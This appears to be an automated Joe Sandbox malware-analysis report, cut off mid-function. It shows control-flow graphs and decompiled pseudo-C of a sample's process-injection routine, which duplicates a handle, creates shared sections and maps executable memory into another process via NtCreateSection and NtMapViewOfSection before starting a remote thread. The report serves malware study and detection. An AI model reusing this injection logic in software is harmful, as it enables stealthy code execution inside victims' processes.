                                                Total number of Limit Nodes:1
                                                execution_graph 4844 402f00 4846 402f2f 4844->4846 4845 402ff6 4846->4845 4847 4019b6 8 API calls 4846->4847 4847->4845 4852 4019c1 4853 4019c4 4852->4853 4854 401a03 Sleep 4853->4854 4855 401a1e 4854->4855 4856 4015d5 7 API calls 4855->4856 4857 401a2f 4855->4857 4856->4857 4810 40300f 4811 402fcc 4810->4811 4813 402ff6 4810->4813 4812 4019b6 8 API calls 4811->4812 4812->4813 4737 402f51 4738 402f55 4737->4738 4740 402ff6 4738->4740 4741 4019b6 4738->4741 4742 4019c7 4741->4742 4743 401a03 Sleep 4742->4743 4744 401a1e 4743->4744 4746 401a2f 4744->4746 4747 4015d5 4744->4747 4746->4740 4748 4015e3 4747->4748 4749 401681 NtDuplicateObject 4748->4749 4758 40179d 4748->4758 4750 40169e NtCreateSection 4749->4750 4749->4758 4751 4016c4 NtMapViewOfSection 4750->4751 4752 40171e NtCreateSection 4750->4752 4751->4752 4753 4016e7 NtMapViewOfSection 4751->4753 4754 40174a 4752->4754 4752->4758 4753->4752 4755 401705 4753->4755 4756 401754 NtMapViewOfSection 4754->4756 4754->4758 4755->4752 4757 40177b NtMapViewOfSection 4756->4757 4756->4758 4757->4758 4758->4746 4858 4015d4 4859 4015e3 4858->4859 4860 401681 NtDuplicateObject 4859->4860 4869 40179d 4859->4869 4861 40169e NtCreateSection 4860->4861 4860->4869 4862 4016c4 NtMapViewOfSection 4861->4862 4863 40171e NtCreateSection 4861->4863 4862->4863 4864 4016e7 NtMapViewOfSection 4862->4864 4865 40174a 4863->4865 4863->4869 4864->4863 4866 401705 4864->4866 4867 401754 NtMapViewOfSection 4865->4867 4865->4869 4866->4863 4868 40177b NtMapViewOfSection 4867->4868 4867->4869 4868->4869 4759 409119 4760 409137 4759->4760 4761 409127 4759->4761 4763 409004 4760->4763 4764 409019 __isleadbyte_l 4763->4764 4766 409025 __isctype_l 4764->4766 4767 40bfaa 4764->4767 4766->4761 4768 40bfbd 4767->4768 4771 40bc05 4768->4771 4770 40bfdd 4770->4766 4772 40bc26 LCMapStringW 4771->4772 4773 40bc41 _memset __crtLCMapStringA_stat __freea ___convertcp ___ansicp 4771->4773 4772->4773 4773->4770 4838 401a39 4839 4019ce 4838->4839 4841 401a2f 4838->4841 4840 401a03 Sleep 4839->4840 4842 401a1e 4840->4842 4842->4841 4843 4015d5 7 API calls 4842->4843 4843->4841

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4015d5-4015de 1 4015e3-4015ef 0->1 2 4015ec 0->2 4 401603 1->4 5 4015f4-40162b call 401274 1->5 2->1 4->5 12 401630-401635 5->12 13 40162d 5->13 15 401956-40195e 12->15 16 40163b-40164c 12->16 13->12 15->12 21 401963-4019b3 call 401274 15->21 19 401652-40167b 16->19 20 401954 16->20 19->20 29 401681-401698 NtDuplicateObject 19->29 20->21 29->20 31 40169e-4016c2 NtCreateSection 29->31 32 4016c4-4016e5 NtMapViewOfSection 31->32 33 40171e-401744 NtCreateSection 31->33 32->33 35 4016e7-401703 NtMapViewOfSection 32->35 33->20 36 40174a-40174e 33->36 35->33 38 401705-40171b 35->38 36->20 39 401754-401775 NtMapViewOfSection 36->39 38->33 39->20 41 40177b-401797 NtMapViewOfSection 39->41 41->20 44 40179d call 4017a2 41->44
                                                C-Code - Quality: 55%
                                                			E004015D5(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long _v12;
                                                				void* _v16;
                                                				void* _v20;
                                                				char _v44;
                                                				char _v52;
                                                				long _v56;
                                                				long _v60;
                                                				char _v64;
                                                				char _v68;
                                                				char _v72;
                                                				char _v76;
                                                				char _v84;
                                                				char _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				char _v100;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t185;
                                                				HANDLE* _t186;
                                                				HANDLE* _t187;
                                                				void* _t192;
                                                				intOrPtr* _t195;
                                                				intOrPtr _t198;
                                                				void* _t199;
                                                				intOrPtr* _t200;
                                                				void* _t203;
                                                				long _t218;
                                                
                                                				_push(0x392);
                                                				_t200 = _t199 + 4;
                                                				L00401274(0x161d, 0xf1, _t185, __eflags);
                                                				_t128 = _a4;
                                                				_v56 = 0;
                                                				if(gs != 0) {
                                                					_v56 = _v56 + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				_v96 = _t88;
                                                				_t186 =  &_v100;
                                                				 *_t186 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t186);
                                                				_t91 =  *_t186;
                                                				if(_t91 != 0) {
                                                					_t131 =  &_v52;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t186 =  &_v44;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                                                					 *_t186 = 0x18;
                                                					_push( &_v52);
                                                					_push(_t186);
                                                					_push(0x40);
                                                					_push( &_v20);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                                                						_v12 = 0;
                                                						_t99 =  &_v84;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t187 =  &_v88;
                                                						if(NtCreateSection(_t187, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							_push(_v84);
                                                							_pop( *_t25);
                                                							_t122 =  &_v72;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t122, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t124 =  &_v64;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t187, _v16, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                									_t198 = _v72;
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t198, 0x104);
                                                									 *((intOrPtr*)(_t198 + 0x208)) = _a16;
                                                									_v12 = _v12 + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 =  &_v84;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 = _a12 + 0x10000;
                                                						_t186 =  &_v92;
                                                						if(NtCreateSection(_t186, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                                                							_push(_v84);
                                                							_pop( *_t46);
                                                							_t103 =  &_v76;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t186, 0xffffffff, _t103, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t105 =  &_v68;
                                                								 *_t105 = 0;
                                                								_t218 = NtMapViewOfSection( *_t186, _v16, _t105, 0, 0, 0,  &_v60, 1, 0, 0x20);
                                                								if(_t218 == 0) {
                                                									L24();
                                                									if(_t218 == 0 && _t218 != 0) {
                                                										asm("hlt");
                                                										_push(_t200);
                                                									}
                                                									_push(0x2ea6);
                                                									_t203 = _t200 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t200 = _t203 - _t164;
                                                									_t192 = _a8 +  *_a8;
                                                									_t138 =  *(_t192 + 6) & 0x0000ffff;
                                                									_push(_t192);
                                                									_t165 = _t192;
                                                									if(_v56 == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) + _v76,  *((intOrPtr*)(_t166 + 0x14)) + _a8, _t139);
                                                										_t200 = _t200 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t186);
                                                									_t222 = _v56;
                                                									if(_v56 == 0) {
                                                										_push(_t186);
                                                										_t169 = _t186[0xd] - _v68;
                                                										_t195 = _t186[0x28] + _v76;
                                                										__eflags = _t195;
                                                										while(1) {
                                                											__eflags =  *_t195;
                                                											if( *_t195 == 0) {
                                                												break;
                                                											}
                                                											_t178 =  *_t195;
                                                											_t195 = _t195 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)(0 + _v76 + _t178));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t186);
                                                										__eflags = 0;
                                                										_t109 =  &_v8;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))(_v16, 0, 0, 0, 0, 0, _t186[0xa] + _v68, _v64, _t109, 0);
                                                									} else {
                                                										L57();
                                                										_pop(_t179);
                                                										_t180 = _t179 - 0x1892;
                                                										 *((intOrPtr*)(_t180 + 0x18c6)) = _t180 + 0x304c;
                                                										L004012E3(_t128, _t222);
                                                										0x33(_t180 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t180 + 0x18eb)) = _t180 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t200;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t186, _t222);
                                                			}


























































                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c4
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401754
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                                                • Instruction ID: f98827d68b3176c6101587f3b7b5f45d89ccd4612d0ba3f6c5a6805aca786af7
                                                • Opcode Fuzzy Hash: d042cd432a47886e0fdfab7ef2fc02bad20cb0d99d5aecb8309b5eacf05c0a0b
                                                • Instruction Fuzzy Hash: 0B614CB4A00205BBEB209F95CC49FEF7BB8EF81B00F14012AF912BA1E5D6759945DB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 47 4015d4-4015ef 51 401603 47->51 52 4015f4-40162b call 401274 47->52 51->52 59 401630-401635 52->59 60 40162d 52->60 62 401956-40195e 59->62 63 40163b-40164c 59->63 60->59 62->59 68 401963-4019b3 call 401274 62->68 66 401652-40167b 63->66 67 401954 63->67 66->67 76 401681-401698 NtDuplicateObject 66->76 67->68 76->67 78 40169e-4016c2 NtCreateSection 76->78 79 4016c4-4016e5 NtMapViewOfSection 78->79 80 40171e-401744 NtCreateSection 78->80 79->80 82 4016e7-401703 NtMapViewOfSection 79->82 80->67 83 40174a-40174e 80->83 82->80 85 401705-40171b 82->85 83->67 86 401754-401775 NtMapViewOfSection 83->86 85->80 86->67 88 40177b-401797 NtMapViewOfSection 86->88 88->67 91 40179d call 4017a2 88->91
                                                C-Code - Quality: 55%
                                                			E004015D4(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				long _v12;
                                                				void* _v16;
                                                				void* _v20;
                                                				char _v44;
                                                				char _v52;
                                                				long _v56;
                                                				long _v60;
                                                				char _v64;
                                                				char _v68;
                                                				char _v72;
                                                				char _v76;
                                                				char _v84;
                                                				char _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				char _v100;
                                                				char _v119;
                                                				void* __ebx;
                                                				void* __esi;
                                                				intOrPtr _t90;
                                                				void* _t93;
                                                				intOrPtr _t94;
                                                				struct _GUID _t101;
                                                				struct _GUID _t103;
                                                				PVOID* _t105;
                                                				PVOID* _t107;
                                                				intOrPtr* _t111;
                                                				PVOID* _t124;
                                                				PVOID* _t126;
                                                				intOrPtr _t131;
                                                				void** _t135;
                                                				signed int _t142;
                                                				int _t143;
                                                				void* _t161;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				signed int _t167;
                                                				signed int _t168;
                                                				signed int _t169;
                                                				void* _t170;
                                                				intOrPtr* _t171;
                                                				void* _t174;
                                                				intOrPtr _t185;
                                                				void* _t186;
                                                				void* _t187;
                                                				void* _t192;
                                                				HANDLE* _t193;
                                                				HANDLE* _t195;
                                                				void* _t200;
                                                				intOrPtr* _t203;
                                                				intOrPtr _t206;
                                                				void* _t210;
                                                				void* _t211;
                                                				intOrPtr* _t212;
                                                				void* _t216;
                                                				intOrPtr _t217;
                                                				long _t231;
                                                
                                                				_t1 =  &_v119;
                                                				 *_t1 = _v119 + __edx;
                                                				_t217 =  *_t1;
                                                				_t211 = _t210 - 0x60;
                                                				_push(_t192);
                                                				_push(0x392);
                                                				_t212 = _t211 + 4;
                                                				L00401274(0x161d, 0xf1, _t192, _t217);
                                                				_t131 = _a4;
                                                				_v56 = 0;
                                                				if(gs != 0) {
                                                					_v56 = _v56 + 1;
                                                				}
                                                				while(1) {
                                                					_t90 =  *((intOrPtr*)(_t131 + 0x48))();
                                                					if(_t90 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
                                                				}
                                                				_v96 = _t90;
                                                				_t193 =  &_v100;
                                                				 *_t193 = 0;
                                                				 *((intOrPtr*)(_t131 + 0x4c))(_t90, _t193);
                                                				_t93 =  *_t193;
                                                				if(_t93 != 0) {
                                                					_t135 =  &_v52;
                                                					 *_t135 = _t93;
                                                					_t135[1] = 0;
                                                					_t193 =  &_v44;
                                                					 *((intOrPtr*)(_t131 + 0x10))(_t193, 0x18);
                                                					 *_t193 = 0x18;
                                                					_push( &_v52);
                                                					_push(_t193);
                                                					_push(0x40);
                                                					_push( &_v20);
                                                					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
                                                						_v12 = 0;
                                                						_t101 =  &_v84;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 = 0x5000;
                                                						_t195 =  &_v88;
                                                						if(NtCreateSection(_t195, 6, 0, _t101, 4, 0x8000000, 0) == 0) {
                                                							_push(_v84);
                                                							_pop( *_t27);
                                                							_t124 =  &_v72;
                                                							 *_t124 = 0;
                                                							if(NtMapViewOfSection( *_t195, 0xffffffff, _t124, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t126 =  &_v64;
                                                								 *_t126 = 0;
                                                								if(NtMapViewOfSection( *_t195, _v16, _t126, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                									_t206 = _v72;
                                                									 *((intOrPtr*)(_t131 + 0x20))(0, _t206, 0x104);
                                                									 *((intOrPtr*)(_t206 + 0x208)) = _a16;
                                                									_v12 = _v12 + 1;
                                                								}
                                                							}
                                                						}
                                                						_t103 =  &_v84;
                                                						 *((intOrPtr*)(_t103 + 4)) = 0;
                                                						 *_t103 = _a12 + 0x10000;
                                                						_t193 =  &_v92;
                                                						if(NtCreateSection(_t193, 0xe, 0, _t103, 0x40, 0x8000000, 0) == 0 && _v12 != 0) {
                                                							_push(_v84);
                                                							_pop( *_t48);
                                                							_t105 =  &_v76;
                                                							 *_t105 = 0;
                                                							if(NtMapViewOfSection( *_t193, 0xffffffff, _t105, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
                                                								_t107 =  &_v68;
                                                								 *_t107 = 0;
                                                								_t231 = NtMapViewOfSection( *_t193, _v16, _t107, 0, 0, 0,  &_v60, 1, 0, 0x20);
                                                								if(_t231 == 0) {
                                                									L25();
                                                									if(_t231 == 0 && _t231 != 0) {
                                                										asm("hlt");
                                                										_push(_t212);
                                                									}
                                                									_push(0x2ea6);
                                                									_t216 = _t212 + 4;
                                                									_t165 = 0x2260;
                                                									_t166 = _t165 << 5;
                                                									_t167 = _t166 + 0x2260;
                                                									asm("lodsb");
                                                									_t168 = _t167;
                                                									asm("loop 0xffffffc4");
                                                									_t169 = _t168 ^ 0xad610a21;
                                                									_t212 = _t216 - _t169;
                                                									_t200 = _a8 +  *_a8;
                                                									_t142 =  *(_t200 + 6) & 0x0000ffff;
                                                									_push(_t200);
                                                									_t170 = _t200;
                                                									if(_v56 == 0) {
                                                										_t171 = _t170 + 0xf8;
                                                										__eflags = _t171;
                                                									} else {
                                                										_t171 = _t170 + 0x108;
                                                									}
                                                									_push(_t142);
                                                									_t143 =  *(_t171 + 0x10);
                                                									if(_t143 != 0) {
                                                										memcpy( *((intOrPtr*)(_t171 + 0xc)) + _v76,  *((intOrPtr*)(_t171 + 0x14)) + _a8, _t143);
                                                										_t212 = _t212 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t193);
                                                									_t235 = _v56;
                                                									if(_v56 == 0) {
                                                										_push(_t193);
                                                										_t174 = _t193[0xd] - _v68;
                                                										_t203 = _t193[0x28] + _v76;
                                                										__eflags = _t203;
                                                										while(1) {
                                                											__eflags =  *_t203;
                                                											if( *_t203 == 0) {
                                                												break;
                                                											}
                                                											_t185 =  *_t203;
                                                											_t203 = _t203 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t174;
                                                												__eflags =  *((intOrPtr*)(0 + _v76 + _t185));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t193);
                                                										__eflags = 0;
                                                										_t111 =  &_v8;
                                                										 *_t111 = 0;
                                                										 *((intOrPtr*)(_t131 + 0x98))(_v16, 0, 0, 0, 0, 0, _t193[0xa] + _v68, _v64, _t111, 0);
                                                									} else {
                                                										L58();
                                                										_pop(_t186);
                                                										_t187 = _t186 - 0x1892;
                                                										 *((intOrPtr*)(_t187 + 0x18c6)) = _t187 + 0x304c;
                                                										L004012E3(_t131, _t235);
                                                										0x33(_t187 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t187 + 0x18eb)) = _t187 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t94 =  *_t212;
                                                				_push(0x392);
                                                				_t161 = 0xf1;
                                                				return L00401274(_t94, _t161, _t193, _t235);
                                                			}





























































                                                0x004015d4
                                                0x004015d4
                                                0x004015d4
                                                0x004015d8
                                                0x004015dc
                                                0x004015f4
                                                0x004015fc
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c4
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401754
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.353998046.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_kmxId0uLRn.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                                                • Instruction ID: 47c243d31b0f26d8a37b4f88288270fe43ad698e9a2cc1103bbf91406d28765b
                                                • Opcode Fuzzy Hash: 06c4aeac5c9008a8151b096b28b30952d6c6a279b8400e856803706fc5547dc2
                                                • Instruction Fuzzy Hash: 92511AB4900245BBEB219F91CC48FEBBFB8FF85700F14012AF912BA2E5D6759945CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 94 4015ea-4015ef 98 401603 94->98 99 4015f4-40162b call 401274 94->99 98->99 106 401630-401635 99->106 107 40162d 99->107 109 401956-40195e 106->109 110 40163b-40164c 106->110 107->106 109->106 115 401963-4019b3 call 401274 109->115 113 401652-40167b 110->113 114 401954 110->114 113->114 123 401681-401698 NtDuplicateObject 113->123 114->115 123->114 125 40169e-4016c2 NtCreateSection 123->125 126 4016c4-4016e5 NtMapViewOfSection 125->126 127 40171e-401744 NtCreateSection 125->127 126->127 129 4016e7-401703 NtMapViewOfSection 126->129 127->114 130 40174a-40174e 127->130 129->127 132 401705-40171b 129->132 130->114 133 401754-401775 NtMapViewOfSection 130->133 132->127 133->114 135 40177b-401797 NtMapViewOfSection 133->135 135->114 138 40179d call 4017a2 135->138
                                                C-Code - Quality: 58%
                                                			E004015EA(void* __esi, void* __eflags) {
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t132;
                                                				signed int _t139;
                                                				int _t140;
                                                				void* _t157;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				signed int _t165;
                                                				void* _t166;
                                                				intOrPtr* _t167;
                                                				void* _t170;
                                                				intOrPtr _t180;
                                                				void* _t181;
                                                				void* _t182;
                                                				HANDLE* _t188;
                                                				HANDLE* _t190;
                                                				void* _t195;
                                                				intOrPtr* _t198;
                                                				void* _t201;
                                                				void* _t202;
                                                				void* _t204;
                                                				intOrPtr* _t205;
                                                				void* _t209;
                                                				long _t224;
                                                
                                                				asm("aad 0x6b");
                                                				_push(0x392);
                                                				_t205 = _t204 + 4;
                                                				L00401274(0x161d, 0xf1, __esi, __eflags);
